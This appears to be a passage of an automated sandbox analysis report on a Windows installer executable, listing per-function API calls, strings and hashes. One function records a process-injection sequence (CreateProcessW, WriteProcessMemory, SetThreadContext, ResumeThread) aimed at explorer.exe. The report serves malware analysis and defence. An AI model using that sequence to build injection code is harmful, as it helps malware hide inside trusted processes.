                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                          • Instruction ID: e71acc89028824f00cb35457f343a2b36ae6b3787995ebe7eae03084bf073169
                                                                                                                                                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                          • Instruction Fuzzy Hash: 3F112BB724318243D744CAFDC4B45B7A7A5EBC6321B2DC37BD0418B774F22A9945960A
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401C7F
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00401CC2
                                                                                                                                                                            • Part of subcall function 004035C0: SysStringLen.OLEAUT32(?), ref: 004035CE
                                                                                                                                                                            • Part of subcall function 004035C0: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 004035E8
                                                                                                                                                                          • GetDateFormatW.KERNEL32(00000800,00000000,00000000,M-d-yyyy,00000000,00000080,?,00000080), ref: 00401D0A
                                                                                                                                                                            • Part of subcall function 00403460: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30), ref: 0040349F
                                                                                                                                                                            • Part of subcall function 00403460: GetLastError.KERNEL32(?,00000000,000000FF), ref: 00403539
                                                                                                                                                                            • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403553
                                                                                                                                                                            • Part of subcall function 00403460: SysFreeString.OLEAUT32(?), ref: 00403560
                                                                                                                                                                            • Part of subcall function 00403460: SetLastError.KERNEL32(?), ref: 00403584
                                                                                                                                                                            • Part of subcall function 00403460: SetLastError.KERNEL32(?,?,00000000,74B04C30), ref: 0040358A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401D31
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00401D65
                                                                                                                                                                            • Part of subcall function 004035C0: _wmemcpy_s.LIBCMT ref: 00403615
                                                                                                                                                                          • GetTimeFormatW.KERNEL32(00000800,00000000,00000000,hh':'mm':'ss tt,00000000,00000080,?,00000080), ref: 00401DAA
                                                                                                                                                                            • Part of subcall function 004025E0: GetLastError.KERNEL32(CC858012,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 00402630
                                                                                                                                                                            • Part of subcall function 004025E0: SetLastError.KERNEL32(?,00483E18,00000000,?,00000000,74B04C30,?,?,00471258,000000FF,?,00401902,InstallShield.log,?,00000001), ref: 004026A8
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(CC858012), ref: 004029C4
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402A20
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(?), ref: 00402A68
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(?), ref: 00402A80
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(00000007), ref: 00402A8B
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(?), ref: 00402AAB
                                                                                                                                                                            • Part of subcall function 00402D40: GetLastError.KERNEL32 ref: 00402DAB
                                                                                                                                                                            • Part of subcall function 00402D40: SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402E14
                                                                                                                                                                            • Part of subcall function 00402D40: SysFreeString.OLEAUT32(?), ref: 00402F06
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(00000000,00000000,00000000,?), ref: 00402B36
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(?), ref: 00402B4C
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(00000007), ref: 00402B57
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(?), ref: 00402B77
                                                                                                                                                                            • Part of subcall function 00402970: GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000), ref: 00402BC3
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(?), ref: 00402BD9
                                                                                                                                                                            • Part of subcall function 00402970: SysFreeString.OLEAUT32(00000007), ref: 00402BE4
                                                                                                                                                                            • Part of subcall function 00402970: SetLastError.KERNEL32(?), ref: 00402C04
                                                                                                                                                                            • Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 00402735
                                                                                                                                                                            • Part of subcall function 004026D0: SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402795
                                                                                                                                                                            • Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 004027BE
                                                                                                                                                                            • Part of subcall function 004026D0: SetLastError.KERNEL32(?,00000000,00000000,000000FF), ref: 0040281E
                                                                                                                                                                            • Part of subcall function 004026D0: GetLastError.KERNEL32 ref: 0040283E
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,00000001,?,?,?,00000001), ref: 00401E67
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401E8B
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401E9E
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401ED1
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401EE6
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F04
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F17
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401F4A
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401F5F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F7D
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401F90
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00401FC3
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00401FD8
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00401FF6
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402009
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0040203C
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402051
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 0040206F
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402082
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 004020B5
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004020CD
                                                                                                                                                                          • SetLastError.KERNEL32(HsG), ref: 00402120
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004021E5
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402203
                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 00402216
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 00402249
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040225E
• SysFreeString.OLEAUT32(?), ref: 0040227C
• SysFreeString.OLEAUT32(?), ref: 0040228F
• SetLastError.KERNEL32(?), ref: 004022C2
• GetLastError.KERNEL32 ref: 004022D1
• SysFreeString.OLEAUT32(?), ref: 004022E9
• SysFreeString.OLEAUT32(?), ref: 004022F6
• SetLastError.KERNEL32(?), ref: 0040231A
• GetLastError.KERNEL32 ref: 0040232F
• SysFreeString.OLEAUT32(?), ref: 00402347
• SysFreeString.OLEAUT32(?), ref: 00402354
  • Part of subcall function 004033B0: __vwprintf_p.LIBCMT ref: 004033DF
  • Part of subcall function 004033B0: vswprintf.LIBCMT ref: 00403411
• SetLastError.KERNEL32(?), ref: 00402378
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$String$Free$Format$AllocDateTime__vwprintf_p_wmemcpy_svswprintf
• String ID: %s[%s]: %s$%s[%s]: %s -- File: %s, Line: %d$HsG$HsG$HsG$M-d-yyyy$hh':'mm':'ss tt
• API String ID: 1002200784-3627406520
• Opcode ID: d9f6bc8becd752235c8caee7071c7edb30dd1ebb7fd6927dc7de9455b369938c
• Instruction ID: 9b39b70ce89a990f8f0f64f0581ea2f15988200d14acf875882281a00136e477
• Opcode Fuzzy Hash: d9f6bc8becd752235c8caee7071c7edb30dd1ebb7fd6927dc7de9455b369938c
• Instruction Fuzzy Hash: E712E170508380DFD731DF69C949B9ABBE1BF89308F01892DE98C972A1DB75A844CF56
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041DD89
• SetBkMode.GDI32(?,00000001), ref: 0041DDF1
• GetDlgCtrlID.USER32 ref: 0041DDF8
• GetStockObject.GDI32(00000005), ref: 0041DE1E
• SendMessageW.USER32(00000405,00000000,00000000,000000D8), ref: 0041DE4E
• PostMessageW.USER32(00000000,00008032,00000000,00000000), ref: 0041DEA3
• SetWindowTextW.USER32(?,-00000004), ref: 0041DEFD
• SetTimer.USER32(?,000003E9,000000FA,00000000), ref: 0041DF1F
• GetDlgItem.USER32 ref: 0041DF2D
• GetDlgItem.USER32 ref: 0041DF37
• GetDlgItem.USER32 ref: 0041DF41
• SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 0041DF56
• GetDlgItem.USER32 ref: 0041DFA5
• SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0041DFB4
• GetObjectW.GDI32(00000000,0000005C,?), ref: 0041DFC9
• GetDC.USER32(00000000), ref: 0041DFD0
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DFDB
• ReleaseDC.USER32 ref: 0041DFF2
• GetDlgItem.USER32 ref: 0041E16F
• GetClientRect.USER32 ref: 0041E180
• GetClientRect.USER32 ref: 0041E187
• GetStockObject.GDI32(00000000), ref: 0041E1A4
• FillRect.USER32 ref: 0041E1B0
• GetSysColor.USER32(0000000F), ref: 0041E1B8
• GetSysColorBrush.USER32(00000000), ref: 0041E1C5
• CreateSolidBrush.GDI32(?), ref: 0041E1D7
• FillRect.USER32 ref: 0041E1FD
• DeleteObject.GDI32(00000000), ref: 0041E204
• DeleteObject.GDI32(000000D8), ref: 0041E21B
• DeleteObject.GDI32 ref: 0041E22C
• DeleteObject.GDI32 ref: 0041E234
• DeleteObject.GDI32 ref: 0041E23C
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: Object$DeleteItem$MessageRect$Send$BrushClientColorFillStock$CapsCreateCtrlDeviceH_prolog3_ModePostReleaseSolidTextTimerWindow
• String ID: Tahoma
• API String ID: 1993185436-3580928618
• Opcode ID: 5c4f197cfb6684dc5efb2ff5eb40c1c11e7b5f109d394619101e4ad4a45c435b
• Instruction ID: 7b900a788b441e3b98be6e7e0d8a344de872ee3235ffe873c199652462b8cc30
• Opcode Fuzzy Hash: 5c4f197cfb6684dc5efb2ff5eb40c1c11e7b5f109d394619101e4ad4a45c435b
• Instruction Fuzzy Hash: F3C19475900314AFEB20AF65DC49FAA3BBDFB09701F01456AF60AA61A1CB784984CF5D
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 0040F49C: __EH_prolog3.LIBCMT ref: 0040F4A3
  • Part of subcall function 0040F441: SysStringLen.OLEAUT32(?), ref: 0040F44E
  • Part of subcall function 0040F441: SysReAllocStringLen.OLEAUT32(?,00000001,?), ref: 0040F468
• GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,00000104,CC858012,?,00000000,00000000,00000000,0046269B,000000FF,?,0040CEEE,00000001,004A4DA0), ref: 004101A6
  • Part of subcall function 0040C92C: __EH_prolog3_GS.LIBCMT ref: 0040C933
  • Part of subcall function 0040C92C: GetLastError.KERNEL32(00000038,00417D0B), ref: 0040C93A
  • Part of subcall function 0040C92C: SetLastError.KERNEL32(00000000), ref: 0040C990
  • Part of subcall function 0040F686: __EH_prolog3_GS.LIBCMT ref: 0040F690
  • Part of subcall function 00433A33: __EH_prolog3.LIBCMT ref: 00433A3A
  • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
• GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00410277
• SetCurrentDirectoryW.KERNEL32(?), ref: 004102A0
• _memset.LIBCMT ref: 004102BA
• PathFileExistsW.SHLWAPI(?,?,?,explorer.exe,?,00000001,?,00000000,00000040), ref: 00410318
• GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000104), ref: 00410373
  • Part of subcall function 00455724: GetLastError.KERNEL32 ref: 004557C3
  • Part of subcall function 00455724: GetLastError.KERNEL32 ref: 00455882
  • Part of subcall function 00455724: __CxxThrowException@8.LIBCMT ref: 004558F2
• CreateProcessW.KERNEL32 ref: 0041041E
• _memset.LIBCMT ref: 0041043F
• _wcsncpy.LIBCMT ref: 004104A7
• _wcsncpy.LIBCMT ref: 004104D5
• GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000), ref: 004104F3
• GetCurrentProcess.KERNEL32(00000000), ref: 004104F6
• DuplicateHandle.KERNEL32(00000000), ref: 004104F9
• TerminateProcess.KERNEL32(?,00000000), ref: 00410519
• CloseHandle.KERNEL32(?), ref: 00410525
• CloseHandle.KERNEL32(?), ref: 0041052D
• MoveFileExW.KERNEL32(?,00000000,00000004), ref: 0041053E
• _memmove.LIBCMT ref: 00410552
• GetThreadContext.KERNEL32 ref: 00410571
• VirtualProtectEx.KERNEL32(?,?,00000C35,00000040,?), ref: 004105B3
• WriteProcessMemory.KERNEL32(?,?,?,00000C35,00000000), ref: 004105CE
• FlushInstructionCache.KERNEL32(?,?,00000C35), ref: 004105DC
• SetThreadContext.KERNEL32(?,00010003), ref: 004105EF
• ResumeThread.KERNEL32(?), ref: 004105FB
• CloseHandle.KERNEL32(?), ref: 00410607
• CloseHandle.KERNEL32(?), ref: 0041060F
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$HandleProcess$CloseString$CurrentDirectoryFileH_prolog3_Thread$ContextFreeH_prolog3_memset_wcsncpy$AllocCacheCreateDuplicateException@8ExistsFlushInstructionMemoryModuleMoveNamePathProtectResumeSystemTerminateThrowVirtualWindowsWrite_memmove
• String ID: D$HsG$HsG$HsG$explorer.exe
• API String ID: 3182427977-157562588
• Opcode ID: fbd56c58dd2500631c223e230ab5adc3bcf9e33d32074cae6593865e24b63588
• Instruction ID: 2184707281973d38a5ea42429bce48e9b07175d1878323ce6b8ec8686bc7d57a
• Opcode Fuzzy Hash: fbd56c58dd2500631c223e230ab5adc3bcf9e33d32074cae6593865e24b63588
• Instruction Fuzzy Hash: 43E15F71900258EFDB21EBA4CC85BDEBBB8AF14304F0041EAE549A7191DBB45BC8CF65
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 00402DAB
• SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402E14
• SysFreeString.OLEAUT32(?), ref: 00402F06
• SysFreeString.OLEAUT32(?), ref: 00402F19
• SetLastError.KERNEL32(?), ref: 00402F4C
  • Part of subcall function 00403F20: GetLastError.KERNEL32 ref: 00403F7F
  • Part of subcall function 00403F20: SetLastError.KERNEL32(HsG), ref: 00403FB7
  • Part of subcall function 00403F20: GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000,00000000,?,00000002,00000001), ref: 00404090
• GetLastError.KERNEL32(?,00000000,000000FF,-00000004,?,00000001,?,00000000,?,000000FF,00000001), ref: 00403020
• SetLastError.KERNEL32(HsG,00483E18,00000000), ref: 00403080
• SysFreeString.OLEAUT32(?), ref: 00403117
• SysFreeString.OLEAUT32(?), ref: 0040312A
• SetLastError.KERNEL32(?), ref: 0040315D
• GetLastError.KERNEL32 ref: 00403172
• SysFreeString.OLEAUT32(?), ref: 0040318A
• SysFreeString.OLEAUT32(?), ref: 00403197
• SetLastError.KERNEL32(?), ref: 004031BB
• GetLastError.KERNEL32(?,00000000,000000FF,-00000004,?,00000001,?,00000000,?,000000FF,00000001), ref: 004031CE
• SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00403221
• GetLastError.KERNEL32 ref: 00403236
• SysFreeString.OLEAUT32(?), ref: 00403254
• SysFreeString.OLEAUT32(?), ref: 00403267
• SetLastError.KERNEL32(?), ref: 0040329A
• GetLastError.KERNEL32 ref: 004032A9
• SysFreeString.OLEAUT32(?), ref: 004032C1
• SysFreeString.OLEAUT32(?), ref: 004032CE
• SetLastError.KERNEL32(?), ref: 004032F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString
• String ID: HsG$HsG$HsG$HsG$\
• API String ID: 2425351278-2706874849
• Opcode ID: 729f00e43b9c1a2af195ea5fc9a494f846da580c8a4c56f550e058efd4d815ca
• Instruction ID: ec87e5070c23eebbc6ec2389c2a0a8d0dcfe49f27a9ccd208546f364f4df5c84
• Opcode Fuzzy Hash: 729f00e43b9c1a2af195ea5fc9a494f846da580c8a4c56f550e058efd4d815ca
• Instruction Fuzzy Hash: D9F13A70508380DFD720DF24C948B9BBBE4FF88318F50892EE599972A1DB75A948CF56
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32 ref: 0040486B
• SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 004048D4
• GetLastError.KERNEL32 ref: 004048F4
• SetLastError.KERNEL32(HsG), ref: 00404931
• GetLastError.KERNEL32(?,000000FF,00000001), ref: 004049AC
• SysFreeString.OLEAUT32(?), ref: 004049C6
• SysFreeString.OLEAUT32(?), ref: 004049D9
• SetLastError.KERNEL32(?), ref: 00404A12
• GetLastError.KERNEL32(00000000,00000000,000000FF,?,?,000000FF,?,000000FF,00000001), ref: 00404A72
• SysFreeString.OLEAUT32(?), ref: 00404A8C
• SysFreeString.OLEAUT32(?), ref: 00404A9F
• SetLastError.KERNEL32(?), ref: 00404AD8
• GetLastError.KERNEL32(?,000000FF,00000001), ref: 00404AEB
• SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00404B42
• GetLastError.KERNEL32 ref: 00404B57
• SysFreeString.OLEAUT32(?), ref: 00404B6B
• SysFreeString.OLEAUT32(?), ref: 00404B78
• SetLastError.KERNEL32(?), ref: 00404B9C
• GetLastError.KERNEL32 ref: 00404BAF
• SysFreeString.OLEAUT32(?), ref: 00404BC3
• SysFreeString.OLEAUT32(?), ref: 00404BD0
• SetLastError.KERNEL32(?), ref: 00404BF4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString
• String ID: HsG$HsG$HsG$HsG$HsG
• API String ID: 2425351278-1357387729
• Opcode ID: 31b674690df0bfdb77382b9ac2b80e54cabc72a7151dde09f842773195b29553
• Instruction ID: 43411a695ce25f9adaacc8678dd8dcf643a664dc996b6a5942799087e16fdfae
• Opcode Fuzzy Hash: 31b674690df0bfdb77382b9ac2b80e54cabc72a7151dde09f842773195b29553
• Instruction Fuzzy Hash: 3EB1F9B15083809FD720DF28C944B5BBBE4BF89318F11892DE598972A1DB75E849CF86
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetLastError.KERNEL32(CC858012), ref: 004029C4
• SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00402A20
• GetLastError.KERNEL32(?), ref: 00402A68
• SysFreeString.OLEAUT32(?), ref: 00402A80
• SysFreeString.OLEAUT32(00000007), ref: 00402A8B
• SetLastError.KERNEL32(?), ref: 00402AAB
• GetLastError.KERNEL32(00000000,00000000,00000000,?), ref: 00402B36
• SysFreeString.OLEAUT32(?), ref: 00402B4C
• SysFreeString.OLEAUT32(00000007), ref: 00402B57
• SetLastError.KERNEL32(?), ref: 00402B77
• GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000), ref: 00402BC3
• SysFreeString.OLEAUT32(?), ref: 00402BD9
• SysFreeString.OLEAUT32(00000007), ref: 00402BE4
• SetLastError.KERNEL32(?), ref: 00402C04
• GetLastError.KERNEL32(?), ref: 00402C23
• SysFreeString.OLEAUT32(?), ref: 00402C39
• SysFreeString.OLEAUT32(00000007), ref: 00402C44
• SetLastError.KERNEL32(?), ref: 00402C64
• GetLastError.KERNEL32 ref: 00402C76
• SetLastError.KERNEL32(?,?,00000000,000000FF), ref: 00402CC4
• GetLastError.KERNEL32 ref: 00402CD1
• SysFreeString.OLEAUT32(00000000), ref: 00402CE7
• SysFreeString.OLEAUT32(?), ref: 00402CF2
• SetLastError.KERNEL32(0047C4E4), ref: 00402D12
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$FreeString
• String ID: HsG$HsG
• API String ID: 2425351278-815662401
• Opcode ID: 3cb5351838574a6b86b4c2eae20592e0e1b5887f2882d5cc0032455ab3e36305
• Instruction ID: 4e7e6d4c3d05729767b160986159ec47f1f64eff1442a30219f063f4109c43c1
• Opcode Fuzzy Hash: 3cb5351838574a6b86b4c2eae20592e0e1b5887f2882d5cc0032455ab3e36305
                                                                                                                                                                          • Instruction Fuzzy Hash: EBC1F371D00258DFDB11DFA5CE48B9EBBB5BF04308F24812AE815B72A1D779A905CF58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0041B383
  • Part of subcall function 0040C6E1: __EH_prolog3.LIBCMT ref: 0040C6E8
• lstrcmpiW.KERNEL32(?,auto,?,?,00000001,000005E8,0041CB09,?,?), ref: 0041B3D1
• CharNextW.USER32(?,/auto,00000000,00000000), ref: 0041B4E8
• lstrlenW.KERNEL32(?,0000000C,?,00000001,00000000,?,00000001), ref: 0041B524
• CharNextW.USER32(?,00000001,?,00000001), ref: 0041B5A8
• CharNextW.USER32(?,eprq), ref: 0041B6F6
• lstrcmpW.KERNEL32(00000000,%IS_E%), ref: 0041B704
• lstrcpyW.KERNEL32 ref: 0041B715
• _memset.LIBCMT ref: 0041B76C
• lstrcpyW.KERNEL32 ref: 0041B7A4
• RegDeleteValueW.ADVAPI32(?,00000000), ref: 0041B7B1
Strings
• embed{, xrefs: 0041B5C2
• /auto, xrefs: 0041B3E3
• Software\Microsoft\Windows\CurrentVersion, xrefs: 0041B73B
• |LJ, xrefs: 0041B7E9
• debuglog, xrefs: 0041B549
• eprq, xrefs: 0041B6DD
• This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full ver, xrefs: 0041B420
• auto, xrefs: 0041B3CB
• %IS_E%, xrefs: 0041B6FE
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: CharNext$lstrcpy$DeleteH_prolog3H_prolog3_Value_memsetlstrcmplstrcmpilstrlen
• String ID: This setup was created with an EVALUATION VERSION of %s, which does not support extraction of the internal MSI file. The full ver$%IS_E%$/auto$Software\Microsoft\Windows\CurrentVersion$auto$debuglog$embed{$eprq$|LJ
• API String ID: 1541416560-2282500369
• Opcode ID: afb3353eed1acb643996f9750557fa778983704dc56765bf2de2cf93d1639b2d
• Instruction ID: 806b597395e447c8a26e7fde34d18a1825895410f20daf3bb73b14d1d1f4c0b5
• Opcode Fuzzy Hash: afb3353eed1acb643996f9750557fa778983704dc56765bf2de2cf93d1639b2d
• Instruction Fuzzy Hash: CAE18A70940658AEDB24EB60CC95BEEB778AB15304F0040EBF10AB61D2DB785F85CF99
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetLastError.KERNEL32 ref: 004039C7
• SetLastError.KERNEL32(HsG,00000000,00000000,000000FF), ref: 00403A2A
• GetLastError.KERNEL32(00000000,00000000,000000FF,?,00000000,?,?), ref: 00403AB2
• SysFreeString.OLEAUT32(?), ref: 00403ACC
